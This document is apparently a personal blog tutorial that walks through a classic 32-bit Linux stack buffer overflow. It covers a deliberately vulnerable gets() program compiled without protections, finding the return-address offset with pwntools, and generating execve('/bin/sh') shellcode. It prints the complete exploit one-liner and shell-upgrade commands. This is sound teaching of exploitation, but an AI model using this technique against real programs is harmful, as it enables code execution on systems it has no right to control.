Pratical approach to binary exploitation

During the years I increased my interest in security, vulnerability and similar stuffs; although I’m fascinated by the theoretical approach from halvar flake, in this post I’ll try to summarize instead the pratical approach, i.e. the effective development of an exploit, probably the simplest possible in a desktop system.

Prerequisites

Since I’m trying to start from zero, I’ll introduce the concepts that are our axioms: we want to study computer’s security, but what’s a computer? In our model (that probably will change during the future excursion on this topic) a computer is a device composed of a processing unit connected to a memory area that accesses via its addresses; in this model the execution of a process happens in a memory space where data and code live together without separation (i.e. the instruction to access memory containing code and data are the same and there is not even a physical separation between them).

The memory is organized in words, i.e. block of bytes that usually align with the number of bits of the architecture. Using the byte as the minimum unit of information to act on, an architecture has to choose how to store data that extends over this limit. If the most significant byte is stored at higher address that the least significant byte we have little endian system, otherwise a big endian system. A desktop computer usually is little endian.

The processing unit has a certain number of registers that vary in quantity and naming but at least one is present: the program counter (pc) that indicates what memory address contains the instruction to execute. Take in mind that a processing unit has its own set of instructions that can execute, this defines its architecture. Each register can be used for all instructions or only for a subset of them (this depends on the architecture) and some registers point to memory area (without distinction).

I’m interested in binary, i.e. programs that contain instructions for a given processing unit: since these instructions need to be loaded in memory to be executed, they are encapsulated in a certain type of executable format; here I treat Linux systems so the format of choice is named ELF. For now is enough imagine that this file format describes to the operating system the layout of the process in memory.

Simplest vulnerable binary

I’ll start with the following, very basic, C program

public/code/simplest_excalation.c view raw
/*
 * gcc -Wall -m32 -no-pie -fno-stack-protector -z execstack public/code/simplest_excalation.c -o public/code/simplest_excalation
 */
#include <stdio.h>
#include <stdlib.h>

#define NAME_LENGTH 32

void greetings() {
    char name[NAME_LENGTH];
    gets(name);

    printf("hello, %s\n", name);
}

int main(int argc, char* argv[], char* envp[]) {

    printf("What's your name? ");

    greetings();

    return EXIT_SUCCESS;
}

To make the process simpler to understand this code needs to be compiled with the following oneliner

$ gcc -g -Wall \
    -m32 \
    -no-pie \
    -fno-stack-protector \
    -z execstack \
    simplest_excalation.c -o simplest_excalation

All the options are necessary to simplify the execution model of the compiled ELF and make it simpler to study.

Compilation is indeed the process of trasforming the code in a memory archive of our program.

If the interaction with this program is gentle, nothing special happens

$ ./simplest_excalation
What's your name? pippo
hello, pippo
$

but if we unfortunately use as our name a longer identifier the process goes banana

$ ./simplest_excalation
What's your name? Augusta Ada King-Noel, Countess of Lovelace
hello, Augusta Ada King-Noel, Countess of Lovelace
Errore di segmentazione

i.e. we have a faulty memory access. But how this is possible?

To understand correctly the cause of the error I need to explain how internally a system manages to execute an algorithm.

In general all is done using memory: the variables that you declare in the body of a function (if not declared static) are contained in the type of memory called stack. In this area are also saved what we can call the metadata of the execution of the process: in practice every function call has a part of the stack, called frame, associated with it that contains the local variables necessary for the function itself and a link to the previous frame; this is necessary because the previous frame contains the arguments passed to the callee.

The previous frame ends with the address from which the caller will resume execution when the callee has terminated its instructions.

To store the state of the frame and the stack there are generally two registers used: the frame pointer (fp) and the stack pointer (sp). The first is used as address with respect to reference things contained in the frame and the second to maintain the position of the first free position in the stack.

Generally is used the following convention for the frame contents

                                               caller frame
,----->  (%ebp) %ebp previous frame
|     -4 (%ebp) first local variable
|     -8 (%ebp) secondo local variable
|    ...
|    -4N (%ebp) Nth local variable
| 4(N+1) (%bp) Nth function argument
|  ...
|      8 (%ebp) first function argument
|      4 (%ebp) caller resume address (old pc)
|  --------------------------------------------------------------
'------  (%ebp) %ebp previous frame              callee frame
      -4 (%ebp) first local variable
      -8 (%ebp) secondo local variable
     ...
     -4N (%ebp) Nth local variable

In all the architectures exist two instructions to explicitely store and load data from the stack, respectively push <register> and pop <register>; there are also instructions that use indirectly the stack for their purpose, like call that sets the pc to a particular subroutine and pushes the return address in the stack. A not so obvious thing is that the when you save a variable on the stack, it grows downwards: the last frame is at a lower address with respect to the previous frames.

This is obvious looking at the code of grettings() (ebp, esp are respectively the frame and stack pointer in the x86 architecture)

gef➤  disassemble greetings 
Dump of assembler code for function greetings:
   0x08049196 <+0>:     push   ebp
   0x08049197 <+1>:     mov    ebp,esp
   0x08049199 <+3>:     push   ebx
   0x0804919a <+4>:     sub    esp,0x24
   0x0804919d <+7>:     call   0x80490d0 <__x86.get_pc_thunk.bx>
   0x080491a2 <+12>:    add    ebx,0x2e5e
   0x080491a8 <+18>:    sub    esp,0xc
   0x080491ab <+21>:    lea    eax,[ebp-0x28]
   0x080491ae <+24>:    push   eax
   0x080491af <+25>:    call   0x8049050 <gets@plt>
   0x080491b4 <+30>:    add    esp,0x10
   0x080491b7 <+33>:    sub    esp,0x8
   0x080491ba <+36>:    lea    eax,[ebp-0x28]
   0x080491bd <+39>:    push   eax
   0x080491be <+40>:    lea    eax,[ebx-0x1ff8]
   0x080491c4 <+46>:    push   eax
   0x080491c5 <+47>:    call   0x8049040 <printf@plt>
   0x080491ca <+52>:    add    esp,0x10
   0x080491cd <+55>:    nop
   0x080491ce <+56>:    mov    ebx,DWORD PTR [ebp-0x4]
   0x080491d1 <+59>:    leave  
   0x080491d2 <+60>:    ret    
End of assembler dump.

Indeed the first two instructions (called prologue) save the old frame pointer and set the new frame pointer to point to the new frame, i.e. where the stack pointer is. The inverse happens with the two last instructions (called epilogue): the frame pointer is restored to point to the main() frame and the execution in main() resumes from the instruction just after the call greetings.

Take in mind that when a frame is left behind, the memory remains with the values that it had, it’s not cleaned in any way!

Vulnerability

The problem with this code is that gets() doesn’t check that the length of the input received doesn’t exceed the size of the buffer used as its destination; in this way it’s possible to write beyond the boundary of the name variable, in particular overwriting ebp and pc. The last one allows to divert the execution flow of the process.

To understand how precisely do that, I try to overwrite it with the As style

$ ./simplest_excalation
What's your name? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
hello, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

if I attach gdb when is waiting for input I will receive this message after I pressed enter in the original terminal

$ gdb -p `pidof simplest_excalation`
...
Program received signal SIGSEGV, Segmentation fault.
...
0x41414141 in ?? ()

Indeed, if we check the memory regions defined for this process we find that only the following are present

gef➤  vmmap
Start      End        Offset     Perm Path
0x08048000 0x0804b000 0x00000000 r-x /opt/gipi.github.io/public/code/simplest_excalation
0x0804b000 0x0804c000 0x00002000 r-x /opt/gipi.github.io/public/code/simplest_excalation
0x0804c000 0x0804d000 0x00003000 rwx /opt/gipi.github.io/public/code/simplest_excalation
0x091dd000 0x091ff000 0x00000000 rwx [heap]
0xf7d7d000 0xf7d96000 0x00000000 r-x /lib/i386-linux-gnu/libc-2.27.so
0xf7d96000 0xf7f50000 0x00019000 r-x /lib/i386-linux-gnu/libc-2.27.so
0xf7f50000 0xf7f51000 0x001d3000 --- /lib/i386-linux-gnu/libc-2.27.so
0xf7f51000 0xf7f53000 0x001d3000 r-x /lib/i386-linux-gnu/libc-2.27.so
0xf7f53000 0xf7f54000 0x001d5000 rwx /lib/i386-linux-gnu/libc-2.27.so
0xf7f54000 0xf7f57000 0x00000000 rwx
0xf7fbe000 0xf7fc0000 0x00000000 rwx
0xf7fc0000 0xf7fc3000 0x00000000 r-- [vvar]
0xf7fc3000 0xf7fc5000 0x00000000 r-x [vdso]
0xf7fc5000 0xf7fc6000 0x00000000 r-x /lib/i386-linux-gnu/ld-2.27.so
0xf7fc6000 0xf7feb000 0x00001000 r-x /lib/i386-linux-gnu/ld-2.27.so
0xf7fec000 0xf7fed000 0x00026000 r-x /lib/i386-linux-gnu/ld-2.27.so
0xf7fed000 0xf7fee000 0x00027000 rwx /lib/i386-linux-gnu/ld-2.27.so
0xffbc0000 0xffbe2000 0x00000000 rwx [stack]

If we overwrite the right register with the right (existent) address we can alter the computation model.

To find the right offset to overwrite pc I could try a few inputs with different lengths; a trick instead is to use a De Bruijn Pattern: a string with a precise non repeating pattern.

Exists a python toolbox: pwntools that provides some command line tools, between them there is the cyclic tool that can help me

$ cyclic 50
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaama
$ ./simplest_excalation
What's your name? aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaama
hello, aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaama

now you can see that the faulting address is different

0x6161616c in ?? ()

cyclic has a lookup functionality that can perform the offset calculation for us:

$ cyclic -l 0x6161616c
44

At this point we can double check that we have the offset we are looking for

$ python -c "print 'A'*44 + 'BBBB' " | ./simplest_excalation
 ...
$ gdb -p `pidof simplest_excalation`
...
Program received signal SIGSEGV, Segmentation fault.
...
0x42424242 in ?? ()

Remember to always double check that the offset you have found allows to put the desired value where you want.

For a simple program like that I could have found the offset simply looking at the instructions: it’s obvious that name is located at %ebp - 0x28, since the pc register is one word above ebp this gives an offset of 44 from the start of the buffer.

Shellcode

Now I have a good estimate of the memory organization around the name buffer

<<< lower addresses                                                                                       upper addresses >>>

[local variables after buffer][            name            ][local variables before buffer][addr old ebp][addr eip][...
|                             |<-------------------------- 44 bytes ----------------------------------->||
|                              `-start of buffer                                                        ||
'----------------------------------------------- greeting()'s frame ------------------------------------''- main()'s frame

To avoid size constraint I’ll place the effective code just after the overwritten eip, this means that the first 44 bytes will be padding;

[          padding             ][addr shellcode][ shellcode ]
'-------- 44 bytes  -----------'          |             /'\
                                          '--------------'

To generate our shellcode I use another tool from pwntools: shellcraft; this oneliner creates a shellcode capable to instantiate a shell

$ shellcraft i386.linux.sh --format asm
    /* execve(path='/bin///sh', argv=['sh'], envp=0) */
    /* push '/bin///sh\x00' */
    push 0x68
    push 0x732f2f2f
    push 0x6e69622f
    mov ebx, esp
    /* push argument array ['sh\x00'] */
    /* push 'sh\x00\x00' */
    push 0x1010101
    xor dword ptr [esp], 0x1016972
    xor ecx, ecx
    push ecx /* null terminate */
    push 4
    pop ecx
    add ecx, esp
    push ecx /* 'sh\x00' */
    mov ecx, esp
    xor edx, edx
    /* call execve() */
    push SYS_execve /* 0xb */
    pop eax
    int 0x80

later will use the --format raw to obtain the shellcode as raw bytes.

What is missing is the knowledge of the address where the shellcode will be at runtime, but this can be calculated knowing the address of name. This address can be obtained attaching gdb to our process when it’s waiting: launch it from one terminal

$ setarch i386 --addr-no-randomize simplest_excalation
What's your name?

and use gdb

$ gdb -p `pidof simplest_excalation`
 ...
[#0] Id 1, Name: "simplest_excala", stopped, reason: STOPPED
───────────────────────────────────────────────────────────────────────────[ trace ]────
[#0] 0xf7fd4059 → Name: __kernel_vsyscall()
[#1] 0xf7e73497 → Name: read()
[#2] 0xf7e003a8 → Name: _IO_file_underflow()
[#3] 0xf7e014bb → Name: _IO_default_uflow()
[#4] 0xf7df46e9 → Name: gets()
[#5] 0x80491b4 → Name: greetings()
[#6] 0x8049205 → Name: main(argc=0x1, argv=0xffffcc64, envp=0xffffcc6c)
────────────────────────────────────────────────────────────────────────────────────────
0xf7fd4059 in __kernel_vsyscall ()
gef➤  frame 5
#5  0x080491b4 in greetings () at public/code/simplest_excalation.c:11
11          gets(name);
gef➤  x/a name
0xffffcb80:     0xf7f63d80

The setarch command set the memory organization to be fixed and not randomized, in order to follow our computer model; otherwise the addresses of objects in the stack change for every execution of the process. This means that we are working in a simplified setup but don’t worry, in future posts we would like to build a more complete understanding of how bypass real protections.

Now all the pieces are in place, we can build the complete exploit from the command line

$ (python -c 'import sys;sys.stdout.write("A"*44 + "\xb0\xcb\xff\xff")'; shellcraft i386.linux.sh --format r ; echo ; cat) | \
    setarch i386 --addr-no-randomize  simplest_excalation
What's your name? hello, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA����jhh///sh/bin��h�4$ri1�QjY�Q��1�j
                                                                                                         X̀
id
uid=1000(gipi) gid=1000(gipi) groups=1000(gipi)

We have a shell! So our process is completed, but I want to give you a trick: how you can see the shell is not fully functional (for example the TAB autocompletion doesn’t work). To have a fully functional shell you can use the following command line jutsu: first of all, I associate a pty with the terminal

python -c 'import pty; pty.spawn("/bin/bash")'

then I do a Ctrl-z to stop the process; at this point I should have returned to the original shell.

Configure the terminal in raw mode without echo and re-enable the shell

$ stty raw -echo
$ fg #  this will not appear since I have disabled the echo

Now I can reset the shell and obtain a fully-fledged terminal.

Environment variables

If you try to replicate my procedure in your system probably you’ll find that the position of the buffer name is different, but why? Simply because the process needs some extra parameters passed from the shell from which was launched.

The signature of the main() function allows to pass up to three arguments

obviously these arguments need to be in memory at execution time otherwise the process cannot read it. The memory is organized following this diagram when the main() function is called

position            content                     size (bytes) + comment
------------------------------------------------------------------------
stack pointer ->  [ argc = number of args ]     4
                  [ argv[0] (pointer) ]         4   (program name)
                  [ argv[1] (pointer) ]         4
                  [ argv[..] (pointer) ]        4 * x
                  [ argv[n - 1] (pointer) ]     4
                  [ argv[n] (pointer) ]         4   (= NULL)

                  [ envp[0] (pointer) ]         4
                  [ envp[1] (pointer) ]         4
                  [ envp[..] (pointer) ]        4
                  [ envp[term] (pointer) ]      4   (= NULL)

                  [ auxv[0] (Elf32_auxv_t) ]    8
                  [ auxv[1] (Elf32_auxv_t) ]    8
                  [ auxv[..] (Elf32_auxv_t) ]   8
                  [ auxv[term] (Elf32_auxv_t) ] 8   (= AT_NULL vector)

                  [ padding ]                   0 - 16

                  [ argument ASCIIZ strings ]   >= 0
                  [ environment ASCIIZ str. ]   >= 0

(0xbffffffc)      [ end marker ]                4   (= NULL)

(0xc0000000)      < bottom of stack >           0   (virtual)
------------------------------------------------------------------------

Given that the process is launched without arguments, the only difference can arise from the environment variables.

If I launch the process and look with gdb to the environment variables passed to it I obtain the following

gef➤  info proc
process 18847
cmdline = 'public/code/simplest_excalation'
cwd = '/opt/gipi.github.io'
exe = '/opt/gipi.github.io/public/code/simplest_excalation'
gef➤  shell cat /proc/18847/environ | wc -c
4522
gef> set $array = envp
set $i = 0
while ($array[$i] != 0)
printf "[%d] %p %s\n", $i, $array[$i], $array[$i++]
end

[0] 0xffffce2e LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:
[1] 0xffffd432 LANG=it_IT.UTF-8
[2] 0xffffd443 GDM_LANG=it_IT.utf8
 ...
[49] 0xffffdfc5 _=/usr/bin/setarch

i.e. I have 50 of these variables that occupy 4522 bytes of memory. Take in mind that there also pointers to this addresses in memory, plus a NULL entry.

Using env is possible to interact with the environment variables and in particular, with the option -i, is possible to launch a process without any of these.

I want to find out what would be the address of the buffer name when the process has not any environment variable:

$ setarch i386 --addr-no-randomize env -i public/code/simplest_excalation
What's your name? 
$ gdb -p `pidof public/code/simplest_excalation`
gef➤  x/a name
0xffffde00:     0xf7f63d80

So it seems that 0xffffde00 is the answer. Taking this address as starting point and using the following python commands

address_buffer = 0xffffde00
n_envp = 50
size_envp = 4522
hex((address_buffer - ((n_envp + 1) * (4)) - size_envp) & 0xfffffff0)

I obtain the value of 0xffffcb80 for the address of the buffer in a process running with my environment variables passed to it. This value corresponds to that found previously.

What’s missing

In the discussion above I removed from the story some elements that for a more deep knowledge should be known

What can go wrong